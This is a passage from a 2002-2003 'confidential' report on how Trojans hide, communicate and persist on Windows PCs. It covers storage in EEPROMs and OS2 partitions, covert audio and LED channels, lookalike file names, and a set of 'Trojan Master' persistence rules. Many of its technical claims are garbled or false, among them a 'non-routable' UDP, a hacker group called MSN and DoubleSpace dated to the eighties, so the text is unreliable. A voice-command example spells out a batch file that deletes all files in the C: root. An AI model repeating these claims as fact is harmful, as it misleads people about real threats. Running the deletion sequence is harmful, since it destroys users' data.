required to enhance the efficiency of the computer, but when usurped by the Trojan Masters it becomes an
excellent place to hide code. The disk cache is a privileged allocation of the normal RAM and can dynamically
range in size between 300 and 500 Megabytes without raising an eyebrow. The access to this RAM is limited
to the microprocessor and the hard disk drive. This access is highly privileged at the hardware level and
cannot easily be viewed--Perfect for the clandestine storage of active programs.
OS2
Another popular place to hide data is by implementing little-used legacy software included in the operating
system for backward compatibility with older applications or operating systems. One such legacy system is
support for IBM’s OS2 operating system access commands. Amazingly, in Win 95 thru 2000 there exits either
full or partial support of an old IBM protocol that allows files to be stored and retrieved on an invisible (to
Windows) partition on the hard drive. This access is gained by using a protocol called a named pipe. In
short, this allows the Trojan to load, run and save data just as if it were a private hard disk. The only
difference is that the normal user cannot access it, nor would it show up on any normal security assay. The
named pipe takes the form of a command line program that gets or puts files into this OS2 formatted
partition on demand in the format Rundll32.dll, %OS2LibPath%\ Named Pipe\Filename. The only hint that
the user may have that this hack is being used is a slight decrease in the free space on the hard disk drive
affected. These days a few Megabytes go unnoticed. However, a few megabytes of Trojan code go a long
way.
DoubleSpace Drives
Windows 95,98, and 2000 (If using FAT32 formatted hard disks) can be victim of another ploy. As before,
the hackers use a little known piece of legacy software. This one has a long and interesting history. Back in
the days of DOS 6.x<3 there was a company that sold software designed to create a virtual compressed hard
disk on your current hard disk. “Double Space Drives” they were called. These were the early eighties when
200 Meg drives cost 200 Dollars! Double Space allowed more that twice as much data to be stored on the
disk at the expense of having to compress and de-compress each file as it was read or written. This caused a
slight performance “hit” in applications that used a lot of disk access. Nevertheless, it was very popular. So
popular, in fact, that Microsoft copied it. The company sued and won. Microsoft removed their version from
their operating system from version 6.3 onwards. However, the software is still available, now in three
different forms: The Double Space format, The Microsoft format and a new shareware format dubbed UPX
(Ultimate Packing for eXecutables) The hackers have used several combinations of these programs to create
hiding places that are very hard to detect. A compressed drive using the normal Double Space Program
becomes a single large file of gobbledygook as seen by Windows. The file is hidden, and that is generally
enough protection for some Trojans. However one side effect of compression is that it is indeed
gobbledygook. Double Space saw this as a feature and added password protection to the algorithm. A bonus
for the Trojan Masters. The more sophisticated Trojans take this a few steps further creating virtual Double
Space drives in RAM with UPX compression. Very hard to spot!
CONFIDENTIAL
Page 49 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Bad blocks on hard drives:
Recently we have seen Trojans holing up in the usable portions of sectors on the hard disk drive marked by
the operating system as bad blocks, these areas are at the most fundamental level ignored by everything,
except, of course, the Trojan Masters.
Operating system files:
Programs large and small can be “Injected” into existing software applications DLLs being a favorite target.
Here the Mal-Ware is linked into the code of an existing program. The host program still works, and the
Trojan program gets the double benefit of not only being well hidden but also being “run” whenever the host
program is run. Hacker “Injectors” can modify the files checksum and reported size to perfectly simulate the
characteristics of the original making them very difficult to locate.
System restore area:
Windows XP and Windows Me Only. This is a great place to put Mal-Ware, system scanners can’t touch it
and it remains completely hidden from the operating system and the user. By default Windows XP installs this
system and allocates up to 10% of your hard disk to its exclusive use. It is possible to erase this area and /
Or turn off the system restore feature, so Trojan Masters only use it for temporary files.
Driver Rollback files:
Similar to System restore, more visible, and smaller in size, so little used these days.
Windows\System Directory:
This is the main area where the files that make up windows live. It has a few tantalizing characteristics and is
extensively used by Low-tech Trojans, its attractive features are: There are thousands of strangely named
files here so finding a single bad file is like finding a needle in a haystack. Trojans use similar filenames to
confuse investigators such as:
Explore.exe (Rather similar to the legitimate Explorer.exe, Windows Explorer) (See RAT.CHINA)
DirectXlib.sys (A play on Microsoft’s DirectX graphics technology)
Microsoft.com (Looks like a web URL but is actually an executable DOS program)
This directory is “Pathed” in the operating system as %SystemRoot% and so is easily available from
anywhere. The operating system files are often targets for the Trojan files so being in the same directory is
also an advantage.
PageFile:
The operating system runs many programs at once. Each program requires a certain amount of RAM
memory. When the system is running many programs (Almost always) the RAM memory is insufficient to
allocate to these programs and a portion of hard disk space is used to create a virtual amount of RAM
(Typically 1.5 Times the actual hardware RAM in the machine) This space is swapped in and out of the hard
disk area and into “real” RAM as needed. This file is locked and inaccessible for all software, including Virus
checkers, and You! A great place to be for a Trojan.
HiberFile:
This is not always implemented on all systems but is always available on laptops, It is similar in nature to the
page file described above but is normally used to store an image of the RAM in the computer when a Laptop
goes into a battery save or Hibernate state.
CONFIDENTIAL
Page 50 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Exotic operating systems:
These operating systems or more accurately file systems are great places to hide, since they cannot be read
at all by the native operating system, they will appear as unpartitioned areas of the hard disk or (In some
cases) not at all (See hard disk under size reporting) Popular favorites for the Trojans are OS2 (IBM’s file
system) Hidden NTFS, A variant of Microsoft’s NT File system. And Linux-Unix variants, many others (About
30 in all) are available to the Trojan.
The Windows Registry:
The Windows registry is a hodge-podge collection of software settings and data that is crucial to the
functioning of the windows computer. It acts as a database for the Operating system, the hardware, and the
application programs, it is also a storage place for security settings and user information. Casual computer
users are rarely aware of this data storage and are strongly cautioned (Quite rightly) from ever browsing its
contents, or changing anything in them. Nevertheless, ordinary users can access this data, albeit via a
round-about way. (Its not dangerous to look at this stuff just don’t change anything unless you know what
you are doing)
Start--- Run--- C:\WINDOWS\system32\regedt32.exe --- OK
For Windows 2000 & 2000 Pro
Start--- Run--- C:\WINNT\system32\regedt32.exe --- OK
For Windows XP Home and XP Pro
This database is accessible by the Trojan too. It has many powerful uses for Mal-Ware especially during a
so-called “escalation of privileges” operation. A tweak to one “Key” in the registry for example can add a
program name to be executed at the next boot-up. There are a zillion other things the Trojans can do in here
but we are digressing from the subject which is storage and hiding places. Since few dare to tread these
Registry paths, The Trojan Masters have deemed it an excellent place to store data. We have seen quite
large binary files stored here. In some cases, the Trojan operators being confident that no one would be
browsing the depths of this complex structure even post “plain text” notes to their colleagues.
Print Spooler:
Part of the Windows operating system, Print Spooler accepts data from any application destined for the
printer. It stores the data then feeds it to the printer at the printer’s own pace. Meanwhile your application
moves on to other things. This Storage area which is a locked file or an area of RAM can be usurped for the
storage of Trojan material. A modified version of the Print Spooler can, under certain circumstances, be used
to temporarily store Trojan data in the printer itself then read it back later. (Excellent for re-Inserting a
Trojan after a Re-Installation “Nuke”)
USB Devices:
There are hundreds of USB devices: cameras, storage “Dongles” printers, scanners, hubs, and so on. Many of
these devices offer RAM or EEPROM storage opportunities for the Trojan Masters. The EEPROM chips
described in detail elsewhere are particularly valuable for the storage of Mal-Ware since they are non-volatile
and can survive “Power Down” periods. They are also almost impossible to view or remove without special
software tools from the manufacturer of the device.
System Volume Information:
On every hard disk volume or Logical drive on your system there exists a portion of hard disk space reserved
for the file system. This area known as the “System Volume Information” area is about 8 megabytes in size.
Quite a large area by Trojan Master standards. It does, of course, have a legitimate purpose for the file
system, acting as an index for files and directories. Nevertheless, as can be expected, the Trojan Masters
have made good use of this very hard to access area.
Let us not forget the traditional places like the hard disk boot sector and some of the newer places like the
Over-Burn area on all of our CDs.
CONFIDENTIAL
Page 51 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
Hiding techniques:
As a matter of course all Mal-Ware is designed to be obscure, The Trojan Masters have “left no stone
unturned” in this regard. File name obfuscation has become a fine art. Consider the following: Using
“Courier 10 system font” as used in the DOS console:
Generally BAD
explore.exe
cnd.com
vcommand.com
comnand.com
spooolsv.exe
_Setup.exe
msdirectX.sys
she11.exe
spoooler.exe
Usually GOOD
explorer.exe
cmd.com
command.com
command.com
spoolsv.exe
Setup.exe
N/A
shell.exe
spooler.exe
The use of file attributes hide files is standard operating procedure for the Trojan Masters. Most computer
users do not see all of the files on their system, certain directories are normally hidden from Windows
Explorer, (e.g. Windows, Windows\System32, WINNT, WINNT\System32) The Folder view settings on
Windows Explorer by default, prevent the user from ever seeing a file whose attributes are either “Hidden” or
“System”. It is possible to change these File Browser settings and view these files. By default they are
invisible.
Open Any Folder… Select:
Tools--- Options--- View---Hidden Files and Folders--- Show Hidden Files and Folders--- Check-Box
Tools--- Options--- View---Hide Protected Operating System Files--- Un-Check-Box
More sophisticated Trojan utilities have the ability to prevent files from appearing in Windows Explorer,
irrespective of these settings. For example the popular Trojan “Vanquish” prevents Windows Explorer from
displaying any file that contains a Trojan Master defined keyword (By default the word is “Vanquish”). Other
Trojans add special, so called, “advanced file attributes” to files that they wish to hide with the same net
effect.
The best Trojan implementations avoid using the windows file system entirely and so it is not possible to see
any of their files using Explorer.
CONFIDENTIAL
Page 52 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
NTFS Hidden Data Streams:
NTFS is simply the NT File system used by Windows 2000, NT and XP. Hidden data streams are essentially an
active data pipe from one file to another. This technique is used to move data around by the Trojan Masters,
A benign example of this type of data movement is the updating of the “Thumbnail” data file which is
automatically created and updated in any folders containing pictures. The data stream happens invisibly in
the background. Any two files can be linked in this way by the Trojan Masters. These data streams can be
put to all sorts of nefarious uses.
UPX:
The UPX or Ultimate Packing of eXecutables utility is a widely used utility freely available on the web which
serves the dual function of compressing the Mal-Ware programs and obscuring their nature and function.
The program processes a normal program .exe or .com and uses various algorithms to compress the file
making it between 1.5 and 5 times smaller. The UPX compressed file is then easier to download and store on
your system. The un-packer (Which is sometimes included in the file itself) can de-compress the file to reform the program. The tool, UPX.exe is often renamed by the Trojan Masters (e.g. A10065.exe) and stored
in obscure regions to further obscure its presence. However, UPX is not, in itself, a Trojan, it is also used by
legitimate software companies to compress files e.g. Adobe Inc. The presence UPX.exe on a system is not a
“Tell” for investigators.
Morphine:
Similar to UPX this software wraps a shell around a program and encrypts its contents thereby completely
evading virus and Trojan scanners that look for a signature sequence of bytes in order to identify Mal-Ware.
Undetectables:
There are many freely available Trojan horse programs on the Internet. Some describe themselves as
“Remote Administration Tools”, others un-ashamedly describe themselves as Trojan Horse programs. Several
groups are now offering custom versions of their Trojans which have advanced functionality or are recompiled or altered in such a way as to elude the scrutiny of all Anti-Virus and Trojan detection systems.
These “Tweaked” versions are available for a fee ranging from just 200 to more than 20,000 U.S. Dollars.
The altered versions are “one-of-a-kind” and their “Signatures” differ from the freely available versions
making them truly, “Undetectable” to all known anti-Trojan programs. Furthermore, since they are usually
deployed on only one “victim” system, they are very unlikely to ever come to the attention of the security
community thus, they remain effective indefinitely. There is no data available as to the popularity of these
“Undetectables” but one can assume that there are many individuals or groups who would be willing to shell
out more than modest amount of funds in order to maintain a permanent spy in some competitor's computer
systems.
E.T. Phone Home
E. T. = Early Trojan. If the method of initial entry for the software has a small deliverable capacity or
payload, the start vector takes the form of a worm type infection. Evidence has been found of the
involvement in some cases of a compressed cavity virus similar to CAK Worm in form and function, but
lacking the infective reproduction properties of a true worm. Replication is not the goal of the stealthy
Trojan. This is consistent with an assumed design goal of stealth over replication and would affect system
performance, revealing its presence or alerting the reproduction heuristics analyzer functions of an intelligent
virus checker. It does share some properties with the CAK worm such as the use of the so called, “Ultimate
Packer for eXecutables” (UPX) a popular shareware utility created to shrink down the payload. In addition, it
makes use of the cavity technique to remain hidden while awaiting a timed activation.
CONFIDENTIAL
Page 53 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Hacker Communications in general.
Clearly the Trojan Masters rely on communications to and from their victim’s systems. The variety of
communications used on today’s systems is mind boggling. The Trojan Masters are, of course adept at using
and mis-using almost every form of machine communication imaginable. As usual “Your mileage may vary”
Telephone Techniques: Telephone Dial up:
(Turn off the modem speaker, wait for quiet time, call out, log on and communicate.)
Anonymous pager:
(Similar to above but call a pager number and send a short text message with a call back number or IP
address)
Call Back:
Turn off modem speaker, pick up phone before the first ring within a certain time range and communicate.
Fax in & out:
Use fax data protocol and software (Which is installed by default) to send and receive data mis-using fax
protocol.
UDP over telephone:
Universal Datagram Protocol, is a non-routable, and non traceable broadcast protocol that can be carried
equally well over any wire that supports IP (Internet Protocol) This technique is widely used by a hacker
group calling themselves MSN (MicroSoft Network) although our research would indicate that this technique
seems to be limited to Windows 98 machines. Newer Trojans use a utility called Covertn to perform
clandestine file transfers using UDP broadcast.
ICMP a low level protocol useful because it is ignored by all as “router talk”.
TCP/IP The most common routable protocol on the internet
Wireless Communications WI-Fi:
Wireless computer communications, form an attractive category for hackers, wireless technology has added a
new phrase to the security lexicon “War-Driving” The process of driving around neighborhoods looking for an
open wireless network port. The 802.11b protocol in particular has been targeted by the hacker community.
In addition to War-driving there has been quite a lot of activity in the field of linier amplifiers. These devices
are illegal radio frequency boosters for the 2.4 Giga-Hertz signal used by the 802.11x systems. This enables
the Hackers to tap into these networks from a much greater range.
Blue Tooth
Blue Tooth is a wireless protocol often used for communications between PCs and cell phones, it is
particularly easy to hack since all Blue Tooth devices are designed to automatically detect and link to any
other Bluetooth device within radio range at the hardware level. (Note: Blue Tooth also has very poor internode security)
CONFIDENTIAL
Page 54 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
Radio Keyboards & mice:
These common devices often use Bluetooth chips and protocols and so open up a vulnerable communications
channel for hackers. (See Blue Tooth section) In addition various vendors use other proprietary frequencies
and formats that allow a properly configured Trojan program to receive commands and data via wireless
transmissions.
Infra-Red communications IrDA:
Infra-Red communications, available on most laptops, printers and some low cost input devices, uses
invisible Infra-Red light to carry a communications signal between machines. Most laptops automatically
configure and accept data from these ports. We have seen this quite often in clandestine Trojans. The IRDA
protocol is installed by default on most laptops and is configured to allow file and printer sharing with little or
no security protection. In rare cases it is possible to utilize ordinary Light Emitting Diodes (LEDs) for this form
of communication albeit one-way, provided that the Trojaned computer system’s motherboard has direct
access to a front panel LED.
Wireless access to non wireless ports.
This technique is rarely seen even in the most sophisticated Trojan suites but it is worthy of note because it
demonstrates the high level of programming skills which have been brought to bear on the task of
establishing connections. The technique involves the USB (Universal Serial Bus) connection, which is
available on most systems. The USB port normally connects to a variety of devices, such as; printers, mice,
keyboards, microphones, USB modems, and many others. The port is designed to self configure when it
“Sees” any such device on the port, using the Plug-and-play (PnP) capabilities of operating systems from
Windows 98 upwards. By transmitting radio / electromagnetic waves of sufficient magnitude in the vicinity of
these ports it is possible to induce sufficient electrical flow in the wires that connect to these USB ports to
fool the computer into recognizing a device as if it was physically connected to the port. This is rather difficult
to achieve since it requires the hackers to possess sophisticated transmitters, plus this technique only works
on USB ports that have un-shielded wires connecting the external port to the motherboard. To achieve this
form of communication channel the Trojan must have already achieved privileged access to the victim’s
system in order to install a sophisticated USB driver program.
CONFIDENTIAL
Page 55 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
Audio Communications
The modern tendency for what was once an add-on-card to be incorporated into the motherboard of the
computer has continued in a predictable pattern now for many years. The latest add-on-cards to be bundled
into main-board functionality are the audio sound system and, to a lesser extent, the AGP / PCI Video card
system often referred to as the VGA card. The once common Sound Blaster card is becoming a thing of the
past replaced by various motherboard-mounted equivalents built into the so-called “support chips” provided
to the motherboard manufacturer by a small group of large chip manufacturers such as Intel, Via, etc.
These chip manufacturers tout their combination hardware, software, firmware (See EEPROM section) as a
“standard system,” as it may be. However, it should be noted that before such systems became “standard,”
they were considered “new and different,” and if consumers had then made decisions in line with the
implications espoused via their current marketing, these odd-balls should have been shunned in favor of the
“standard” sound blaster card. Marketing has such a freedom of expression, don’t you think? Nevertheless,
reality is such that “standards” are created by the manufacturer’s forceful leverage of its huge marketing
power, its massive influence on board design standards and quite restrictive long-term trade agreements,
which have totally killed the add-on sound-card business and created a duopoly of “standard” sound systems.
Namely, Intel’s AC’97, and VIA’s built-in 5. 1 sound system.
The existence of a relatively small number of programmable chips that have the ability to perform complex
operations on sounds, especially since the software for these chips (including application software
development kits, SDKs) are freely available from the chip manufacturer’s tech sites, has led to the
development of a remarkably sophisticated array of shared tools, shareware and freeware applications, and
3rd party manufacturer’s application software, all of which has contributed to the hacker arsenal of audio
based techniques. These techniques are used by the Trojan to expand communication capabilities, and in
some cases assist in gaining access to a computer’s systems.
Soft Modem communications
The ability to manipulate the sounds system on a computer can lead to some rather esoteric uses of audio.
Using the audio chip driver software it is possible to control, in minute detail, the processing and production
of audio signals. The sound chips are equipped with programmable gain operational amplifiers and various
programmable waveform synthesizers plus programmable filters of every kind. By using the programmable
features of the built in sound chips the Trojan Masters have been able to devise numerous methods of illicit
communication.
The techniques vary considerably but the common thread is to generate a Frequency Shift Key (FSK) protocol
that is different from that generally used for standard modem communications. And so being “proprietary” is
difficult to detect. This FSK audio signal may be routed to the Telephone line connected to any modem on
the computer especially if the modem is a “Soft Modem” so called because its normal FSK audio is generated
by software through the motherboard’s audio chips. The capabilities of these chips are growing by leaps and
bounds, and so to are the illicit communication capabilities. The best Trojan systems are now quite able to
communicate at broadband data rates over DSL lines using this technique.
CONFIDENTIAL
Page 56 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
Hacking with Audio Communications
A fundamental requirement for a hacker program is, of course to spread its influence to other systems, by
any and all means possible. In certain circumstances, this leads to the use of audio as a communications
tool. Imagine a situation where a Trojan has gained a foothold on a laptop computer that is rarely if ever
connected to the Internet. This is not normally a tenable situation for the bandwidth-hungry Trojan masters.
However, in certain situations, it is possible to bring such a system under control and in communication,
albeit slow communication, with the Trojan masters. The trick is to use the built in microphones and
speakers attached to the laptop to achieve local, bi-directional communications with a desktop, which is
online and also compromised. This is achieved by modifications made to the audio drivers and sound
synthesizer software, which is shipped with the computer. Many modes are possible and are routinely tried
and tested by the Trojan software. These include:

Low frequency phase modulation of the left and right speaker differential

High frequency phase or frequency modulation of a noise “hiss” signal

High frequency amplitude modulation of a noise “hiss” signal

Carrier-less frequency modulation of a legitimate audio signal “music”

Carrier-Less amplitude or speaker differential modulation of a legitimate audio signal.

Differential echo or “phalanging” modulation of legitimate audio signal.
Irrespective of the means of audio communication used, the methodology of implementation follows a
general pattern.
1.
2.
3.
4.
5.
Use the compromised connected system to gain foothold access to the off-line laptop
Adjust communications for optimum performance.
Prepare to exploit any faster communication method when available.
Issue Error and or Upgrade message to encourage on line data access.
Make use of Floppy, Zip and other hand carried data transports.
Most important of the steps above is the first “foothold” step. A foothold can be achieved in hundreds of
ways, some of which are discussed elsewhere in this document. Worthy of note are the following very
specialized techniques involving audio.




Insert an audio communications payload into a single replication boot sector virus in the
hope that sooner or later a desktop created floppy, Zip disk or CD will be inserted into the
laptop. (Reasonable assumption).
Perform a Plug and Play spoof of a storage device i.e. a USB connected RAM drive and route
it through any Blue Tooth device (Such as a remote mouse or keyboard)
Insert an executable penetration hack into a printer buffer in the hope that the laptop will be
connected to a shared printer.
Modulate a desktop machine controlled LED to simulate an IRD Plug and Play printer device.
This may include downloading and installing modifications of the computer’s audio control software enabling
so called “Advanced features” such as Microphone gain boost, high frequency kernel mode modulation
techniques, and Speaker to microphone translation (Using the PC’s speakers in reverse to perform the
function of a microphone) The possibilities are endless. The Reader may note that these techniques also can
be used in conjunction with several other clever tricks such as voice recognition and voice command.
CONFIDENTIAL
Page 57 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
Voice Command and Voice Recognition
Since its first introduction in Windows Me (Millennium), Voice Command (VC), and Voice Recognition (VR)
have maintained rather low profiles in the Windows coterie of functionality. VR & VC have not yet really
taken their places as valid methods of interacting with a computer, though their potential is enormous. The
project has been plagued by problems throughout the many years of development, and still is not considered
“Ready for prime time.”
VR & VC have also suffered from less than enthusiastic support from many third party software
manufacturers. This lack of support is not without cause. VR and its sub-set cousin VC have both been
crippled by their rather lack-luster accuracy due to the sheer difficulty of the task which must take into
account accents, mannerisms, and the immense variability inherent in human speech. VR was released long
before the computing power needed to cope with this task was commonly available. These days the power is
there but inaccuracy persists due, in part, to the immense variability in the quality of both sound cards and
microphones commonly installed on today’s computers.
Nevertheless, both Voice Command and, to a lesser degree, Voice Recognition are incorporated in many of
our computers and may yet someday supplant the keyboard and mouse as the primary method of interacting
with our computers. In the meantime Voice Command and to a lesser extent Voice Recognition have their
uses for the Trojan Masters.
Voice Command
The functionality of voice command is simple; tell the computer what you want it to do and it does it! From
the security perspective this opens a veritable Pandora’s box of possibilities. As could be expected of the
Trojan Masters, all of these possibilities have been fully exploited. When a command is executed it is
executed under the credentials of the currently logged on user, If that user is a member of the
“Administrators” group then the commands when executed wield considerable power.
What if you could “tell” the computer to do the following:
Open Notepad
NEW
D-e-l-*-.-*
Save As
C-:-\:-h-a-k-.-b-a-t
CLOSE
RUN
C:-h-a-k
This sequence would render your computer useless by deleting all of the files in the root directory of the C:
Drive!
CONFIDENTIAL
Page 58 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
User Names and Permissions
The Standard Trojan is a Built-in Feature of Your System
The Words BUILT-IN, STANDARD, GENERIC, SYSTEM etc. are utilized extensively to disguise and dismiss
suspicion of all manner of Trojan antics. STANDARD being a favorite of the add on communications ports
which begin sprouting up all over your PCI bus and co-installing on top of anything that you may have that
can in any way talk to anything. This includes a few things that don’t talk at all. No, not everything with
these monikers is bad. According to the rules, it has to be a legitimate and used name or convention, but by
the time you have five GENERIC Serial Port Controllers, three STANDARD Serial Port Enumerators And
between five and ten GENERIC Serial Port Adaptors and their associated WAN Mini-Ports with two or three
co-installers buried behind you can bet that something is amiss.
What better name to hide behind than these brown-bag, plain-packaged innocuous “Standard Stuff” “Nothing
to worry about” names.
When it comes to BUILT-IN, we are most likely talking about users again. Microsoft provides us with the
legitimate pattern and established precedent for various BUILT-IN accounts such as; BUILT-IN GUEST,
BUILT-IN ADMINISTRATOR and BUILT-IN NT AUTHORITY these accounts are supposed to exist but they
should not be messing with your security settings while you are asleep! Equally out of place are characters
Like “Remote Desktop Assistant Microsoft 133ee1276” (XP only) and all manner of disabled, enabled or just
faking a disability GUEST Accounts, whether they be disarmingly prefixed by the BUILT-IN pro-name or not.
Other variants are the legitimate user names such as Backup Operator, Power User, Recovery operator who
either are not normally installed unless specifically added in by an administrator and suddenly appear
equipped and ready to their STANDARD BUILT-IN duty and there is a whole class of lower level users imbued
with hidden super powers.
Fear the user introducing themselves as the GENERIC, STANDARD, BUILT-IN \ (INSERT YOUR OWN LOCAL
WORKGROUP NAME) \ BACKUP OPERATOR. HE may look like the janitor but under that mild mannered
exterior resides Phineas Phreak empowered with Domain Administrator privileges and an NT Root Authority
certificate signed by Bill Gates himself!
CONFIDENTIAL
Page 59 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Certificates of Authority and Digital Signature Certificates
Power to install any software, override and or rewrite the security rules designed to prevent such things is
relatively easy to get these days, digital signature files are sitting in a folder on your machine, or at least they
should be, if they are not this may be a bad sign. Many variants of the Trojan swipe these certificates on
sight, thus ensuring you will never have full authority over your machine. Other variants rather boldly take
the time to order an updated fresh set of certificates from Microsoft in your name.
Overriding Super Certificates which identify remote login users as trusted, or certify the authenticity of an
installation program or the legitimacy of a complete overhaul of all your security settings are generally
required to present authority certificates and software signature certificates which are difficult to fake or
reproduce. However, as is often the case, the Trojan typically bypasses all of the strong areas of effective
security design and performs a flanking maneuver avoiding the problem entirely. “No I don’t need to break
no crypto, that’s hard! I just steal the keys!” Your domain controller has overriding authority keys that you, as
Administrator, cannot ordinarily bar. Code signing and identity verification certificates such as the trust
certificates issued by Verisign Inc. to its corporate clients which include Microsoft, are securely issued only to
the signing company. However, recently Verisign issued a number of Certificates in the name of Microsoft
Inc. to a hacker posing as a Microsoft Employee. These Certificates quickly spread around the globe and
were, and indeed continue to be, used to certify as legitimate the, “accompanying software.”
Despite relatively quick action by Verisign and Microsoft to address this gaffe, their solution was programmed
for disaster from the outset since it required casual computer users to first hear about the proposed solution
and then follow a highly technical procedure, which manually revoked the stolen certificate numbers in the
computer’s registry.
Few casual users have ever taken the trouble to diligently plod through the hundreds of security patches and
hot fixes issued by Microsoft each year. In fact I would go so far as to say that few professionals, myself
included, have that kind of time. I, like many others, take a risk until the next Service Pack or Security Rollup
package is released.
CONFIDENTIAL
Page 60 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Persistence of control - Hanging On
One key secret to the modern Trojan’s current success and part of the certainty of this class of software’s
dominance in the future is the Trojan Master’s elegant implementation of another assumed set of rules:
RULE: Never allow a system once taken over to escape control. Implement multiple copies of the starter
code and put them in places they don’t know exist.
RULE: Anticipate all forms of aggression against our software, and build multiple levels of counter and
defense whilst trying to remain plausibly normal defending anything less than an exposure incident.
RULE: On first sign of an exposure incident Nuke! Erase! Destroy! Leave no evidence whatsoever! But do it
sneaky and quiet with legitimate error messages wherever possible.
RULE: IF a particular system is getting more that one brief but nuked exposure, run a full DNA RNA analysis
and consider changing maintenance & updates mode to null.
RULE: IF maintenance & updates fails to null user and exposures continue, consider implementing period of
no boot.
RULE: When nulling a user with a history of exposure, always attempt a true clean and secure simulation for
a calming period before re-attempting take over.
RULE: If DNA indicates not nullable and persistent exposures continue, consider either magic status or
temporary “true clean.”
RULE: If Magic status refused or post “true clean” period maintenance status is attacked or software is
exposed again offer perm status with no nuke.
RULE: If perm status with exposures is persistent cycle through no boot, true clean, perm mode, increase no
boot period each cycle until perm no boot status reached.
RULE: If exposure secret vault occurs, follow previous rules 1st time only
RULE: If exposure secret vault 2nd time, call in a manager.
CONFIDENTIAL
Page 61 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
CMOS RAM
Complimentary Metal Oxide Semiconductor Random Access Memory is Silicon Valley’s way of referring to
memory chips that do not forget even when the power is really honestly turned all the way off. They achieve
this trick by the simple expediency of having a little battery which kicks in if ever we do get the power of and
keeps this little puppy alive and active. This one never goes to sleep and is not frozen either. Initially
designed to hold must have but non-static data such as the real-time date and time, designers have
increased its capacity and functionality over the years, adding hard drive statistics, boot configuration options
ram chip timing data, sometimes rather low security boot up passwords, and a host of other “stick around”
but remain changeable data.
EEPROM
This is a very technical acronym for a very simple concept is refers to a type of memory that does not forget
even with the power off and does not even need a battery to keep its data. This seemingly ideal form of
memory is used sparingly in computers since it is both very slow and very expensive. Nevertheless, it is
finding its way into places you would never suspect. Due to its remarkable ability to be reprogrammed while
in place, it gives the manufacturer an opportunity to upgrade a product in the field, and a second chance to
fix a design or manufacturing snafu without an expensive recall. No small wonder these little guys are
everywhere. They are the perfect place to hide a small client control program that cannot be found or erase
by any normal means. Naturally, we are hyper aware of these guys and we look for them assiduously, even
now we are discovering new places where they can hang out and provide a toehold entry point for a Trojan
takeover or a retake operation. Most recently, we were astonished to find an EEPROM broadcasting from
inside the battery of a laptop computer! It would seem that almost every modern rechargeable battery is now
shipped with an EEPROM holding information such as a unique serial number, date of manufacture model
number, name and place of manufacturer (See RNA section), number of recharge cycles, battery wear
condition, battery chemistry, capacity information etc.
Even more difficult to locate are the EEPROMS that store configuration information here and there throughout
the computer itself. Hey, if I were a board designer and could buy myself a job-saving insurance against
design snafus, I would definitely stock up on these babies. Oh, how much the lead design engineer on the
ill-fated early Pentium chip (the one that couldn’t multiply properly) must have wished for a field
programmable upgrade. In recent years, these chips have found their way into most areas of the computer
and so, in rough order of size, the not yet complete, list of places to hide stuff that persists:













VGA Graphics Card BIOS
ACPI Bios Extension ROM
System Board Bios (Boot ROM BIOS or FLASH ROM)
Ethernet Card Configuration BIOS
Ethernet Card on-board Net boot ROM
Intel Itainium network boot ROM
Modem Configuration BIOS
PCI Chip Configuration BIOS (North Bridge)
PCI Chip Configuration BIOS (South Bridge)
Microprocessor Microcode update EEPROM
ATAPI CDROM FLASH RAM BIOS
ATAPI CD R and or CDR-W FLASH ROM
ATAPI DVD UPGRADABLE FLASH ROM BIOS
(With a special mention of the programmable DVD licensing settings: (re-programmable only 4 times)
And finally our newly discovered rechargeable battery statistics chip
The long-winded acronym: for those who just have to know
ELECTRONICALLY ERASABLE, PROGRAMMABLE, READ-ONLY MEMORY.
CONFIDENTIAL
Page 62 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
